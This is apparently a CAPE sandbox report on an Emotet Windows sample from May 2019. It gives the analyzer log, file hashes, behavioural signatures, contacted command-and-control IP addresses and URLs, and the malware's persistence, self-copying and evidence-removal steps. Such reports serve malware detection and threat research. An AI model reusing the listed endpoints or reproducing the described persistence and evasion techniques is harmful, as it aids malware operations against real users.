CAPE

Detections: Emotet


Analysis

Category Package Started Completed Duration Options Log
FILE Emotet 2019-05-16 02:17:55 2019-05-16 02:22:01 246 seconds Show Options Show Log
route = internet
procdump = 1
2019-05-16 03:17:56,015 [root] INFO: Date set to: 05-16-19, time set to: 02:17:56, timeout set to: 200
2019-05-16 03:17:56,140 [root] DEBUG: Starting analyzer from: C:\zvxmavoi
2019-05-16 03:17:56,140 [root] DEBUG: Storing results at: C:\YmvQWhNsc
2019-05-16 03:17:56,140 [root] DEBUG: Pipe server name: \\.\PIPE\mJNEPd
2019-05-16 03:17:56,140 [root] INFO: Analysis package "Emotet" has been specified.
2019-05-16 03:18:01,148 [root] DEBUG: Started auxiliary module Browser
2019-05-16 03:18:01,148 [root] DEBUG: Started auxiliary module Curtain
2019-05-16 03:18:01,148 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2019-05-16 03:18:03,970 [modules.auxiliary.digisig] DEBUG: File is not signed.
2019-05-16 03:18:03,970 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2019-05-16 03:18:03,970 [root] DEBUG: Started auxiliary module DigiSig
2019-05-16 03:18:03,986 [root] DEBUG: Started auxiliary module Disguise
2019-05-16 03:18:03,986 [root] DEBUG: Started auxiliary module Human
2019-05-16 03:18:03,986 [root] DEBUG: Started auxiliary module Screenshots
2019-05-16 03:18:04,002 [root] DEBUG: Started auxiliary module Sysmon
2019-05-16 03:18:04,002 [root] DEBUG: Started auxiliary module Usage
2019-05-16 03:18:04,002 [root] INFO: Analyzer: DLL set to Extraction.dll from package modules.packages.Emotet
2019-05-16 03:18:04,017 [root] INFO: Analyzer: Package modules.packages.Emotet does not specify a DLL_64 option
2019-05-16 03:18:04,065 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\elVqUs.exe" with arguments "" with pid 2008
2019-05-16 03:18:04,065 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-05-16 03:18:04,065 [lib.api.process] INFO: Option 'exclude-apis' with value 'RegOpenKeyExA' sent to monitor
2019-05-16 03:18:04,065 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-16 03:18:04,065 [lib.api.process] INFO: 32-bit DLL to inject is C:\zvxmavoi\dll\AyRigGp.dll, loader C:\zvxmavoi\bin\PrGiMZq.exe
2019-05-16 03:18:04,095 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mJNEPd.
2019-05-16 03:18:04,095 [root] DEBUG: Loader: Injecting process 2008 (thread 2092) with C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:04,095 [root] DEBUG: Process image base: 0x00400000
2019-05-16 03:18:04,095 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:04,111 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00415000 - 0x77380000
2019-05-16 03:18:04,111 [root] DEBUG: InjectDllViaIAT: Allocated 0x1a0 bytes for new import table at 0x00420000.
2019-05-16 03:18:04,111 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-05-16 03:18:04,111 [root] DEBUG: Successfully injected DLL C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:04,111 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2008
2019-05-16 03:18:06,124 [lib.api.process] INFO: Successfully resumed process with pid 2008
2019-05-16 03:18:06,124 [root] INFO: Added new process to list with pid: 2008
2019-05-16 03:18:06,513 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77380000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x773d124a, Wow64PrepareForException: 0x0
2019-05-16 03:18:06,513 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x230000
2019-05-16 03:18:06,513 [root] DEBUG: CAPE initialised (32-bit).
2019-05-16 03:18:06,592 [root] INFO: Disabling sleep skipping.
2019-05-16 03:18:06,592 [root] INFO: Monitor successfully loaded in process with pid 2008.
2019-05-16 03:18:06,592 [root] INFO: Disabling sleep skipping.
2019-05-16 03:18:06,592 [root] INFO: Disabling sleep skipping.
2019-05-16 03:18:06,592 [root] INFO: Disabling sleep skipping.
2019-05-16 03:18:06,732 [root] DEBUG: ProtectionHandler: Address: 0x401000, RegionSize: 0xd000
2019-05-16 03:18:06,732 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40e000.
2019-05-16 03:18:06,732 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-05-16 03:18:06,732 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-05-16 03:18:06,747 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-05-16 03:18:06,747 [root] DEBUG: DumpProcess: Module entry point VA is 0x40c9a0
2019-05-16 03:18:06,763 [root] INFO: Added new CAPE file to list with path: C:\zvxmavoi\CAPE\2008_748658316452019
2019-05-16 03:18:06,763 [root] DEBUG: DumpProcess: Module image dump success
2019-05-16 03:18:06,763 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-05-16 03:18:06,763 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40e000.
2019-05-16 03:18:06,763 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-05-16 03:18:06,872 [root] INFO: Announced 32-bit process name: elVqUs.exe pid: 2972
2019-05-16 03:18:06,872 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-05-16 03:18:06,872 [lib.api.process] INFO: Option 'exclude-apis' with value 'RegOpenKeyExA' sent to monitor
2019-05-16 03:18:06,872 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-16 03:18:06,872 [lib.api.process] INFO: 32-bit DLL to inject is C:\zvxmavoi\dll\AyRigGp.dll, loader C:\zvxmavoi\bin\PrGiMZq.exe
2019-05-16 03:18:06,888 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mJNEPd.
2019-05-16 03:18:06,888 [root] DEBUG: Loader: Injecting process 2972 (thread 1948) with C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:06,888 [root] DEBUG: Process image base: 0x00400000
2019-05-16 03:18:06,888 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:06,888 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00415000 - 0x77380000
2019-05-16 03:18:06,904 [root] DEBUG: InjectDllViaIAT: Allocated 0x1a0 bytes for new import table at 0x00420000.
2019-05-16 03:18:06,904 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-05-16 03:18:06,904 [root] DEBUG: Successfully injected DLL C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:06,904 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2972
2019-05-16 03:18:06,920 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77380000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x773d124a, Wow64PrepareForException: 0x0
2019-05-16 03:18:06,920 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1c0000
2019-05-16 03:18:06,920 [root] DEBUG: CAPE initialised (32-bit).
2019-05-16 03:18:06,920 [root] INFO: Disabling sleep skipping.
2019-05-16 03:18:06,934 [root] INFO: Added new process to list with pid: 2972
2019-05-16 03:18:06,934 [root] INFO: Monitor successfully loaded in process with pid 2972.
2019-05-16 03:18:06,950 [root] INFO: Notified of termination of process with pid 2008.
2019-05-16 03:18:07,013 [root] DEBUG: ProtectionHandler: Address: 0x401000, RegionSize: 0xd000
2019-05-16 03:18:07,013 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40e000.
2019-05-16 03:18:07,029 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-05-16 03:18:07,043 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-05-16 03:18:07,043 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-05-16 03:18:07,043 [root] DEBUG: DumpProcess: Module entry point VA is 0x40c9a0
2019-05-16 03:18:07,059 [root] INFO: Added new CAPE file to list with path: C:\zvxmavoi\CAPE\2972_44758316452019
2019-05-16 03:18:07,091 [root] DEBUG: DumpProcess: Module image dump success
2019-05-16 03:18:07,091 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-05-16 03:18:07,091 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40e000.
2019-05-16 03:18:07,107 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-05-16 03:18:07,138 [root] INFO: Process with pid 2008 has terminated
2019-05-16 03:18:13,221 [root] INFO: Announced starting service "gluerel"
2019-05-16 03:18:13,221 [root] INFO: Attaching to Service Control Manager (services.exe - pid 460)
2019-05-16 03:18:13,221 [lib.api.process] DEBUG: Using CreateRemoteThread injection.
2019-05-16 03:18:13,237 [lib.api.process] INFO: Option 'exclude-apis' with value 'RegOpenKeyExA' sent to monitor
2019-05-16 03:18:13,237 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-16 03:18:13,237 [lib.api.process] INFO: 64-bit DLL to inject is C:\zvxmavoi\dll\zHuNXGll.dll, loader C:\zvxmavoi\bin\IvOoxoLc.exe
2019-05-16 03:18:13,253 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mJNEPd.
2019-05-16 03:18:13,269 [root] DEBUG: Loader: Injecting process 460 (thread 0) with C:\zvxmavoi\dll\zHuNXGll.dll.
2019-05-16 03:18:13,269 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed.
2019-05-16 03:18:13,283 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-05-16 03:18:13,299 [root] DEBUG: Process dumps enabled.
2019-05-16 03:18:13,315 [root] INFO: Disabling sleep skipping.
2019-05-16 03:18:13,346 [root] WARNING: Unable to place hook on LockResource
2019-05-16 03:18:13,346 [root] WARNING: Unable to hook LockResource
2019-05-16 03:18:13,378 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 460 at 0x0000000074420000, image base 0x00000000FFAB0000, stack from 0x0000000001286000-0x0000000001290000
2019-05-16 03:18:13,394 [root] DEBUG: Commandline: C:\Windows\sysnative\services.exe.
2019-05-16 03:18:13,408 [root] INFO: Added new process to list with pid: 460
2019-05-16 03:18:13,408 [root] INFO: Monitor successfully loaded in process with pid 460.
2019-05-16 03:18:13,424 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-05-16 03:18:13,424 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-05-16 03:18:13,424 [root] DEBUG: Successfully injected DLL C:\zvxmavoi\dll\zHuNXGll.dll.
2019-05-16 03:18:14,500 [root] INFO: Announced 32-bit process name: gluerel.exe pid: 1088
2019-05-16 03:18:14,500 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-05-16 03:18:14,516 [lib.api.process] INFO: Option 'exclude-apis' with value 'RegOpenKeyExA' sent to monitor
2019-05-16 03:18:14,516 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-16 03:18:14,516 [lib.api.process] INFO: 32-bit DLL to inject is C:\zvxmavoi\dll\AyRigGp.dll, loader C:\zvxmavoi\bin\PrGiMZq.exe
2019-05-16 03:18:14,532 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mJNEPd.
2019-05-16 03:18:14,548 [root] DEBUG: Loader: Injecting process 1088 (thread 2380) with C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:14,548 [root] DEBUG: Process image base: 0x00400000
2019-05-16 03:18:14,548 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:14,548 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00415000 - 0x77380000
2019-05-16 03:18:14,563 [root] DEBUG: InjectDllViaIAT: Allocated 0x1a0 bytes for new import table at 0x00420000.
2019-05-16 03:18:14,578 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-05-16 03:18:14,595 [root] DEBUG: Successfully injected DLL C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:14,595 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1088
2019-05-16 03:18:14,609 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77380000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x773d124a, Wow64PrepareForException: 0x0
2019-05-16 03:18:14,625 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x230000
2019-05-16 03:18:14,625 [root] DEBUG: CAPE initialised (32-bit).
2019-05-16 03:18:14,657 [root] INFO: Disabling sleep skipping.
2019-05-16 03:18:14,673 [root] INFO: Added new process to list with pid: 1088
2019-05-16 03:18:14,673 [root] INFO: Monitor successfully loaded in process with pid 1088.
2019-05-16 03:18:14,703 [root] DEBUG: ProtectionHandler: Address: 0x401000, RegionSize: 0xd000
2019-05-16 03:18:14,720 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40e000.
2019-05-16 03:18:14,734 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-05-16 03:18:14,734 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-05-16 03:18:14,734 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-05-16 03:18:14,734 [root] DEBUG: DumpProcess: Module entry point VA is 0x40c9a0
2019-05-16 03:18:14,734 [root] INFO: Added new CAPE file to list with path: C:\zvxmavoi\CAPE\1088_7351458316452019
2019-05-16 03:18:14,734 [root] DEBUG: DumpProcess: Module image dump success
2019-05-16 03:18:14,750 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-05-16 03:18:14,750 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40e000.
2019-05-16 03:18:14,750 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-05-16 03:18:14,766 [root] INFO: Announced 32-bit process name: gluerel.exe pid: 2444
2019-05-16 03:18:14,766 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-05-16 03:18:14,782 [lib.api.process] INFO: Option 'exclude-apis' with value 'RegOpenKeyExA' sent to monitor
2019-05-16 03:18:14,782 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-16 03:18:14,782 [lib.api.process] INFO: 32-bit DLL to inject is C:\zvxmavoi\dll\AyRigGp.dll, loader C:\zvxmavoi\bin\PrGiMZq.exe
2019-05-16 03:18:14,812 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mJNEPd.
2019-05-16 03:18:14,812 [root] DEBUG: Loader: Injecting process 2444 (thread 2068) with C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:14,828 [root] DEBUG: Process image base: 0x00400000
2019-05-16 03:18:14,828 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:14,828 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00415000 - 0x77380000
2019-05-16 03:18:14,828 [root] DEBUG: InjectDllViaIAT: Allocated 0x1a0 bytes for new import table at 0x00420000.
2019-05-16 03:18:14,844 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-05-16 03:18:14,844 [root] DEBUG: Successfully injected DLL C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:14,844 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2444
2019-05-16 03:18:14,844 [root] INFO: Notified of termination of process with pid 1088.
2019-05-16 03:18:14,844 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77380000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x773d124a, Wow64PrepareForException: 0x0
2019-05-16 03:18:14,844 [root] WARNING: Unable to open termination event for pid 1088.
2019-05-16 03:18:14,844 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1c0000
2019-05-16 03:18:14,844 [root] DEBUG: CAPE initialised (32-bit).
2019-05-16 03:18:14,844 [root] INFO: Notified of termination of process with pid 2972.
2019-05-16 03:18:14,844 [root] INFO: Disabling sleep skipping.
2019-05-16 03:18:14,859 [root] INFO: Added new process to list with pid: 2444
2019-05-16 03:18:14,859 [root] INFO: Monitor successfully loaded in process with pid 2444.
2019-05-16 03:18:14,891 [root] DEBUG: ProtectionHandler: Address: 0x401000, RegionSize: 0xd000
2019-05-16 03:18:14,891 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40e000.
2019-05-16 03:18:14,891 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-05-16 03:18:14,891 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-05-16 03:18:14,891 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-05-16 03:18:14,891 [root] DEBUG: DumpProcess: Module entry point VA is 0x40c9a0
2019-05-16 03:18:14,907 [root] INFO: Added new CAPE file to list with path: C:\zvxmavoi\CAPE\2444_9071458316452019
2019-05-16 03:18:14,907 [root] DEBUG: DumpProcess: Module image dump success
2019-05-16 03:18:14,907 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-05-16 03:18:14,907 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40e000.
2019-05-16 03:18:14,921 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-05-16 03:18:15,250 [root] INFO: Process with pid 2972 has terminated
2019-05-16 03:18:15,250 [root] INFO: Process with pid 1088 has terminated
2019-05-16 03:21:34,072 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-05-16 03:21:34,072 [root] INFO: Created shutdown mutex.
2019-05-16 03:21:35,085 [root] INFO: Setting terminate event for process 2444.
2019-05-16 03:21:35,085 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 2444
2019-05-16 03:21:35,085 [root] INFO: Terminating process 2444 before shutdown.
2019-05-16 03:21:35,085 [root] INFO: Waiting for process 2444 to exit.
2019-05-16 03:21:36,099 [root] INFO: Waiting for process 2444 to exit.
2019-05-16 03:21:37,114 [root] INFO: Waiting for process 2444 to exit.
2019-05-16 03:21:38,128 [root] INFO: Waiting for process 2444 to exit.
2019-05-16 03:21:39,141 [lib.api.process] INFO: Successfully terminated process with pid 2444.
2019-05-16 03:21:39,141 [root] INFO: Waiting for process 2444 to exit.
2019-05-16 03:21:40,155 [root] INFO: Shutting down package.
2019-05-16 03:21:40,155 [root] INFO: Stopping auxiliary modules.
2019-05-16 03:21:40,155 [root] INFO: Finishing auxiliary modules.
2019-05-16 03:21:40,155 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-05-16 03:21:40,155 [root] WARNING: File at path "C:\YmvQWhNsc\debugger" does not exist, skip.
2019-05-16 03:21:40,155 [root] INFO: Analysis completed.

MalScore

10.0

Emotet

Machine

Name Label Manager Started On Shutdown On
target-02 target-02 ESX 2019-05-16 02:17:55 2019-05-16 02:21:59

File Details

File Name emotet_exe_e2_4fd7e69b107fe0c6493339f845a3c6482f6ab370f35952a13bff026b6c9a7cf2_2019-05-15__203502.ex
File Size 76800 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 e6794e6260d39e25db2f04af257acc3f
SHA1 eabc4ee8576f54f4dcde5f6133e926f21ac5c44a
SHA256 4fd7e69b107fe0c6493339f845a3c6482f6ab370f35952a13bff026b6c9a7cf2
SHA512 85134592c7b930639f9cdacf71c6910efccb86920ba1f42169c823b0066afb3248e4fe7e02bdf801d54052c75801e8077a33ba15c59d5277ad2190e031a9f947
CRC32 8CA4A6EF
Ssdeep 1536:DXgQIKlOUcKXCNUheD3fhNiuGnhzGYXgAq1oaW:D3sUtyNUhelGhaM
TrID
  • 38.3% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 26.2% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 11.8% (.EXE) OS/2 Executable (generic) (2029/13)
  • 11.6% (.EXE) Generic Win/DOS Executable (2002/3)
  • 11.6% (.EXE) DOS Executable Generic (2000/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Resubmit sample

Signatures

Behavioural detection: Executable code extraction
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 2008 trigged the Yara rule 'Emotet'
Possible date expiration check, exits too soon after checking local time
process: gluerel.exe, PID 1088
Mimics the system's user agent string for its own requests
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: propsys.dll/PSLookupPropertyHandlerCLSID
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: propsys.dll/PSCreatePropertyStoreFromObject
DynamicLoader: propsys.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToStringAlloc
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: propsys.dll/PropVariantToBuffer
DynamicLoader: propsys.dll/PropVariantToUInt64
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: propsys.dll/InitPropVariantFromBuffer
DynamicLoader: ADVAPI32.dll/GetNamedSecurityInfoW
DynamicLoader: ADVAPI32.dll/TreeSetNamedSecurityInfoW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: OLEAUT32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptGenKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptDuplicateHash
DynamicLoader: CRYPTSP.dll/CryptEncrypt
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: iphlpapi.DLL/GetAdaptersAddresses
DynamicLoader: DHCPCSVC.DLL/DhcpRequestParams
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: CRYPTSP.dll/CryptDecrypt
DynamicLoader: CRYPTSP.dll/CryptVerifySignatureW
Performs HTTP requests potentially not found in PCAP.
url: 75.177.169.225:80/entries/xian/
url: 78.188.7.213:8090/schema/schema/
url: 207.44.45.27:22/publish/badge/forced/merge/
url: 138.68.13.161:8080/xian/
url: 138.68.13.161:8080/loadan/
url: 138.68.13.161:8080/pdf/devices/symbols/merge/
url: 138.68.13.161:8080/vermont/publish/
url: 90.57.69.215:80/stubs/forced/
url: 191.92.69.115:80/results/report/forced/merge/
Repeatedly searches for a not-found process, may want to run with startbrowser=1 option
Multiple direct IP connections
direct_ip_connections: Made direct connections to 6 unique IP addresses
HTTP traffic contains suspicious features which may be indicative of malware related traffic
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://138.68.13.161:8080/xian/
suspicious_request: http://138.68.13.161:8080/loadan/
suspicious_request: http://138.68.13.161:8080/pdf/devices/symbols/merge/
suspicious_request: http://138.68.13.161:8080/vermont/publish/
suspicious_request: http://138.68.13.161:8080/results/sess/
Performs some HTTP requests
url: http://138.68.13.161:8080/xian/
url: http://138.68.13.161:8080/loadan/
url: http://138.68.13.161:8080/pdf/devices/symbols/merge/
url: http://138.68.13.161:8080/vermont/publish/
url: http://138.68.13.161:8080/results/sess/
The binary likely contains encrypted or compressed data.
section: name: .ret, entropy: 7.89, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00011200, virtual_size: 0x00011086
Deletes its original binary from disk
Attempts to remove evidence of file being downloaded from the Internet
file: C:\Windows\SysWOW64\gluerel.exe:Zone.Identifier
Installs itself for autorun at Windows startup
service name: gluerel
service path: "C:\Windows\SysWOW64\gluerel.exe"
CAPE detected the Emotet malware family
Creates a copy of itself
copy: C:\Windows\SysWOW64\gluerel.exe
Drops a binary and executes it
binary: C:\Windows\SysWOW64\gluerel.exe

Screenshots


Hosts

Direct IP Country Name
Y 90.57.69.215 [VT] France
Y 78.188.7.213 [VT] Turkey
Y 75.177.169.225 [VT] United States
Y 207.44.45.27 [VT] United States
Y 191.92.69.115 [VT] Colombia
Y 138.68.13.161 [VT] United States

DNS

No domains contacted.


Summary

C:\Windows\Globalization\Sorting\sortdefault.nls
C:\
C:\Users\user\AppData\Local\Temp\elVqUs.exe
C:\Windows\SysWOW64\dafpanes.exe
C:\Windows\
C:\Windows\SysWOW64\
\Device\KsecDD
C:\Windows\SysWOW64\shell32.dll
C:\Windows\SysWOW64\gluerel.exe
C:\Users
C:\Users\user\AppData\Local\Microsoft\Windows\Caches
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db
\??\MountPointManager
C:\Users\desktop.ini
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\Temp
C:\Windows
C:\Windows\SysWOW64
C:\Windows\SysWOW64\propsys.dll
C:\Windows\sysnative\propsys.dll
C:\Users\user\AppData\Local\
C:\Windows\SysWOW64\gluerel.exe:Zone.Identifier
C:\Windows\Temp
C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\System32\ras\*.pbk
C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\user\AppData\Local\Temp\elVqUs.exe
\Device\KsecDD
C:\Windows\SysWOW64\shell32.dll
C:\
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db
